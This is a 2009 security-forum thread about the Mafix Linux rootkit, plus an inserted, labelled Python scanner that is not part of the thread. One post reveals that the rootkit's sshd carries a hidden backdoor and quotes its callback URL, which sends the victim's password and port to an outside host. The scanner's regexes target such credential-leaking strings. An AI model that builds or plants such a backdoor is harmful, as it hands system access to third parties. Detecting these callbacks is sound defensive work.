Government Security
Network Security Resources

Mafix - Linux 2.6 Rootkit

linux rootkit
8 replies to this topic

#1 vaf0r

vaf0r

    Private

  • Members
  • 2 posts

Posted 15 July 2009 - 09:10 PM

found this while browsing around some forums
i tested it on a 2.6.18 box and it worked nicely and has a nice layout
did a check for mail functions and couldn't find anything so it seems to be a good release.

Edit by Ryan:
Removed dangerous file URL's and begging for money line.

#2 h4nk

h4nk

    Private

  • Members
  • 2 posts

Posted 16 July 2009 - 09:27 PM

found this while browsing around some forums
i tested it on a 2.6.18 box and it worked nicely and has a nice layout
did a check for mail functions and couldn't find anything so it seems to be a good release.

Edit by Ryan:
Removed dangerous file URL's and begging for money line.


source would be nice?

#3 vaf0r

vaf0r

    Private

  • Members
  • 2 posts

Posted 19 July 2009 - 01:03 AM

source would be nice?


I don't have source code for this, I am not the creator :wacko:

#4 jswayzy

jswayzy

    Private

  • Members
  • 6 posts

Posted 17 August 2009 - 04:51 AM

there's a backdoor in sshd file - knocks onto:
brock.iroxusux.com/root.php?pass=%s&port=%s
and on brawl.izthewiz.net

So it tells you pass/port there :)
Fuckers!

#5 bonarez

bonarez

    Retired GSO Second Lieutenant

  • Sergeant Major
  • 1,252 posts

Posted 17 August 2009 - 09:59 AM

hehe, nice find jswayzy!!

bit like the rm -rf / thingy from AS in the latest 'sshd exploit' but with varying results..

don't run code you don't understand :lol:
"Ask the right question and you will receive the right answer. I'm just very sensitive about the right syntax"

Read the rules before you post

#6 berz3k

berz3k

    Private First Class

  • Members
  • 70 posts

Posted 28 August 2009 - 06:43 AM

So? the file is dangerous or functional to use?

does any1 have more details?

-berz3k.

#7 jswayzy

jswayzy

    Private

  • Members
  • 6 posts

Posted 28 August 2009 - 10:45 PM

This script tells your pass/port/host you trojaned to someone else's site. Is it enough?

You can edit ./root file & remove the ./sshd string, but there are maybe other files that knock elsewhere.

Besides, changing binaries - is a shitty way.
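
Added example, not part of the original thread or any poster's code: a defender-side check for the kind of phone-home string described in posts #4 and #7, extended to walk a whole directory because other files may carry a similar callback. The sample bytes, the host `callback.example.invalid`, and the parameter list and regexes are constructed assumptions for illustration.

```python
import re
from pathlib import Path

# Runs of 6+ printable ASCII bytes, the same idea as strings(1).
PRINTABLE = re.compile(rb"[\x20-\x7e]{6,}")
# A printf-style placeholder bound to a query parameter, e.g. pass=%s
FORMAT_PARAM = re.compile(rb"[?&]([A-Za-z_]+)=%[sdu]")
# Something that looks like a URL, a host name plus path, or a web script call.
WEB_TARGET = re.compile(rb"(https?://|[a-z0-9-]+(\.[a-z0-9-]+)+/|\.(php|cgi|asp)\?)", re.I)
# Assumed list of parameter names worth flagging when filled from a format string.
SENSITIVE = {b"pass", b"passwd", b"password", b"port", b"host", b"user"}

def suspicious_strings(data: bytes):
    """Return (offset, string, params) for embedded callback-style format strings."""
    hits = []
    for m in PRINTABLE.finditer(data):
        s = m.group()
        params = {p.lower() for p in FORMAT_PARAM.findall(s)}
        if WEB_TARGET.search(s) and params & SENSITIVE:
            hits.append((m.start(), s.decode("ascii"), sorted(p.decode() for p in params)))
    return hits

def scan_tree(root):
    """Scan every regular file under root; return {path: hits} for files with hits."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and not path.is_symlink():
            try:
                hits = suspicious_strings(path.read_bytes())
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if hits:
                report[str(path)] = hits
    return report

# Constructed samples: fake binary bytes with a placeholder host (not from the thread).
SAMPLE_TROJANED = (b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 16 +
                   b"callback.example.invalid/root.php?pass=%s&port=%s\x00" +
                   b"OpenSSH_4.3\x00")
SAMPLE_CLEAN = b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 16 + b"Usage: %s [-p port] host\x00"

if __name__ == "__main__":
    import sys
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for off, s, params in hits:
            print(f"{path}: offset {off}: {s!r} leaks {params}")
```

A hit only means a file contains such a string in plain text; a packed or obfuscated binary will not show one, so comparing binaries against the distribution's package checksums remains the stronger check.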

#8 Heaven32

Heaven32

    Private

  • Members
  • 1 posts

Posted 01 October 2010 - 11:51 PM

Here is nothing dangerous for use just you have to need complete information about that.
Heaven

#9 ghafil

ghafil

    Private

  • Members
  • 1 posts

Posted 01 November 2011 - 12:36 AM

download link?




